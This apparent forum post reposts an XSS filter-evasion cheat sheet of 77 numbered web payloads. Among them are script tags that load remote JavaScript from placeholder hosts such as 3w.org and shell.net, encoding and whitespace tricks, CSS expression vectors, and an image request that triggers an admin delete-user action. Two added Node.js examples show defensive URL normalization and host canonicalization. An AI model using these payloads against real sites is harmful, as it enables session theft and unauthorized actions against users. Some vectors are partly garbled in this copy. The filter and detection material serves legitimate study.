There doesn't seem to be much XSS material on t00ls, so I copied this over when I came across it, in case anyone wants to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (the semicolons are required): the quotes are written as &quot;, which the browser decodes inside the attribute value before treating it as a URL
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode, so no quotes are needed (generate the codes with an XSS calculator/encoder)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal entity) encoding of the whole javascript: URL (generate with an encoder); the encoded body is omitted in this copy
<IMG SRC=jav..omitted..S')>

(9) Long 7-digit decimal entity encoding without semicolons (generate with an encoder); the encoded body is omitted in this copy
<IMG SRC=jav..omitted..S')>

(10) Hex entity encoding, also without semicolons (generate with an encoder); the encoded body is omitted in this copy
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab: a raw horizontal tab sits between jav and ascript; the browser strips it before parsing the URL
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme XSS example (in the original every character of the tag is on its own line; the line breaks were collapsed when this was copied)
<IMG SRC="javascript:alert('XSS')">

(16) Getting around length limits (all pieces must be on the same page; together they build document.write("<script src=http://www.shell.net/1.js></script>") and eval it)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective on domestic sites, since there is nowhere left where they can be exploited.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

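Added example (not part of the copied cheat sheet, and not anyone's production code): a small Node.js script that runs the SRC values from vectors (3), (4), (8)-(14), (17) and (19) through a naive 'javascript:' substring check and through a scheme allowlist applied after browser-style normalization (numeric entity decoding, removal of tab/LF/CR/NUL, removal of leading control characters and spaces). The vector strings, the SAFE_SCHEMES set and all function names are constructed for this example.

```javascript
// Added example, not from the original post: normalizing an attribute URL the
// way browsers do before deciding whether its scheme is allowed. The vectors
// below are constructed from the SRC values on this page.

// Decode numeric character references as an HTML attribute value would:
// &#106; (decimal), &#x6A; (hex), the 7-digit padded form &#0000106, and all
// of these with the trailing semicolon omitted.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const isHex = num[0].toLowerCase() === 'x';
    const cp = isHex ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Browsers drop ASCII tab, LF and CR anywhere inside a URL and drop leading
// C0 control characters and spaces before looking at the scheme. NUL is
// dropped here too because vectors (17)/(18) rely on parsers that swallowed
// it; current browsers do not execute java\0script:, but a filter should
// still reject it.
function normalizeUrl(raw) {
  return decodeNumericEntities(raw)
    .replace(/[\t\n\r\0]/g, '')
    .replace(/^[\x01-\x20]+/, '');
}

// The kind of check these vectors are written to get past.
function naiveBlocked(raw) {
  return raw.includes('javascript:');
}

// Allowlist of schemes applied to the normalized URL (my choice of schemes).
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrl(raw) {
  const s = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  if (!m) return true; // no scheme: a relative URL
  return SAFE_SCHEMES.has(m[1].toLowerCase());
}

// Constructed SRC values mirroring vectors on this page.
const VECTORS = [
  "javascript:alert('XSS')",                                   // (3)
  "JaVaScRiPt:alert('XSS')",                                   // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (8)
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", // (9)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", // (10)
  "jav\tascript:alert('XSS')",                                 // (11) raw tab
  "jav&#x09;ascript:alert('XSS')",                             // (12) encoded tab
  "jav\nascript:alert('XSS')",                                 // (13) newline
  "jav\rascript:alert('XSS')",                                 // (14) carriage return
  "java\0script:alert('XSS')",                                 // (17) NUL
  " &#14; javascript:alert('XSS')",                            // (19) leading space + control char
];

// Runs every vector through both checks; returned so it can be asserted on.
function evaluateVectors(vectors = VECTORS) {
  return vectors.map((v) => ({
    vector: v,
    naiveBlocked: naiveBlocked(v),
    normalized: normalizeUrl(v),
    safe: isSafeUrl(v),
  }));
}

for (const r of evaluateVectors()) {
  console.log(`${r.naiveBlocked ? 'naive: blocked' : 'naive: MISSED '}  allowlist: ${r.safe ? 'ALLOWED' : 'rejected'}  ${JSON.stringify(r.normalized)}`);
}
```

Run it with node: the naive check only catches the two vectors that spell javascript: literally, while every vector normalizes to the same string and is rejected by the allowlist. Note what is deliberately absent: there is no blocklist of bad schemes. Rejecting everything that is not http, https or mailto is what survives the encoding tricks above, and the same normalization is what a sanitizer has to apply before its own scheme check.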
(19) Spaces and meta characters before the JavaScript in an IMG tag (the original also has a control-character entity in the leading whitespace; this copy lost it)
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2 (protocol-relative source)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (the event-handler attribute was stripped when this was copied; only its argument survives)
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image plus extra characters (code points 1-32, 34, 39, 160, 8192-8213, 12288 and 65279 inserted right before javascript:; the inserted character was lost in this copy, so the payload reads the same as (46))
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute using expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (any tag name works: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE tag using background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of this vector survived the copy)
exppression(alert("XSS"))'>

(53) STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash movie can obfuscate your XSS code (this assembles getURL("javascript:alert('XSS');") at runtime)
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, put the JavaScript inside an image file and load that file as a script (the image URL was lost in this copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands: the image request is sent with the victim's session, so it can trigger any action the victim is authorized to perform
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands, part 2 (a.jpg is on the same server; this is an Apache Redirect rule)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Getting past symbol filters with quote encapsulation: a filter that assumes the tag ends at the first > stops at the quoted one (62-66 vary the quote characters; 67 splits the tag with document.write)
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass: an IP address instead of a hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the hostname is percent-encoded; it decodes to 3w.org)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Dword IP address (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) Hex IP address
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP address
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: a newline and two tabs inside the URL (browsers strip them) plus decimal, octal and hex parts; it resolves to 66.102.7.147
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Omitting http:
<A HREF="//www.google.com/">XSS</A>

(75) Omitting www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
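Added example (not part of the copied cheat sheet): canonicalizing the host of a link so that the spellings in vectors (68)-(76) compare equal to what a host blocklist or allowlist actually stores. It implements the inet_aton rules browsers use for IPv4 literals (dword, hex, octal, mixed, fewer than four parts), strips the tab/LF/CR characters of (73), percent-decodes the host of (69) and drops the trailing dot of (76). The BLOCKED set, the LINKS array and the function names are my own; the WHATWG URL parser (new URL() in Node and in browsers) applies the same IPv4 rules and is a convenient cross-check.

```javascript
// Added example, not from the original post: canonicalizing link hosts so that
// the spellings in vectors (68)-(76) all compare equal to the address or name
// a blocklist (or allowlist) actually contains. Names and inputs are my own.

// Parse one dotted part the way inet_aton does: "0x.." is hex, a leading "0"
// means octal, anything else must be plain decimal. NaN marks a non-number.
function parseIPv4Part(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]*$/.test(part)) return part.length === 1 ? 0 : parseInt(part.slice(1), 8);
  if (/^[1-9][0-9]*$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Canonical dotted quad for any inet_aton-style literal with 1 to 4 parts
// (the last part fills the remaining low-order bytes), or null when the host
// is not an IPv4 literal at all, e.g. a DNS name.
function canonicalizeIPv4(host) {
  const nums = host.split('.').map(parseIPv4Part);
  if (nums.length > 4 || nums.some(Number.isNaN)) return null;
  const lastBytes = 5 - nums.length; // 4 parts -> 1 byte, 1 part (dword) -> 4 bytes
  const last = nums[nums.length - 1];
  if (last >= 2 ** (8 * lastBytes)) return null;
  let value = 0;
  for (let i = 0; i < nums.length - 1; i++) {
    if (nums[i] > 255) return null;
    value = value * 256 + nums[i];
  }
  value = value * 2 ** (8 * lastBytes) + last;
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join('.');
}

// Extract the host from a link. Browsers remove ASCII tab, LF and CR from the
// whole URL first, which is what lets vector (73) split "http" and "66".
// Userinfo and an explicit port are dropped; IPv6 literals are out of scope.
function hostFromUrl(raw) {
  const s = raw.replace(/[\t\n\r]/g, '');
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^\/?#]*)/i.exec(s);
  if (!m) return null; // no authority, e.g. javascript: or a relative path
  const authority = m[1].slice(m[1].lastIndexOf('@') + 1);
  let host = authority.replace(/:\d*$/, '');
  try { host = decodeURIComponent(host); } catch { /* keep raw host on malformed escapes */ }
  // A trailing dot is the absolute-DNS form of vector (76).
  return host.replace(/\.$/, '').toLowerCase();
}

// Host as a blocklist should see it: dotted quad for IP literals, name otherwise.
function canonicalHost(raw) {
  const host = hostFromUrl(raw);
  if (host === null || host === '') return null;
  return canonicalizeIPv4(host) ?? host;
}

// Constructed blocklist; domain entries also match their subdomains, which is
// what catches vector (75)'s dropped "www" alongside (74) and (76).
const BLOCKED = new Set(['192.168.0.1', '66.102.7.147', 'google.com']);

function isBlockedLink(href, blocked = BLOCKED) {
  const host = canonicalHost(href);
  if (host === null) return false;
  for (const entry of blocked) {
    if (host === entry || host.endsWith('.' + entry)) return true;
  }
  return false;
}

// The HREF values from vectors (68)-(76), as constructed inputs.
const LINKS = [
  'http://127.0.0.1/',
  'http://%33%77%2E%6F%72%67',
  'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01',
  'http://0300.0250.0000.0001',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://google.com/',
  'http://www.google.com./',
];

for (const href of LINKS) {
  console.log(JSON.stringify(href).padEnd(42), '->', canonicalHost(href), isBlockedLink(href) ? '(blocked)' : '');
}
```

Comparing raw HREF strings against the blocklist would match none of the nine links; after canonicalization seven of them are caught, and only (68) and (69) pass because their hosts really are different from the blocked entries. The same canonical form is what you should log and alert on in detection rules, otherwise every obfuscated spelling of an address is a separate indicator.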